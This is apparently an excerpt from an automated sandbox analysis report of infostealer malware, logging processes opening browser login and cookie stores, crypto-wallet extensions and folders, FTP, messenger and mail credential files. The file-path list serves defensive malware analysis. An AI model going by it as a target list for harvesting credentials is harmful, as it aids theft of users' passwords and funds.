Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\kwTJRnYVwAQEhcNiCzeUXAdMAbCUXdSzVvyfmsqkGAXe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\5454e6f062\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000020001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\1000021002\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
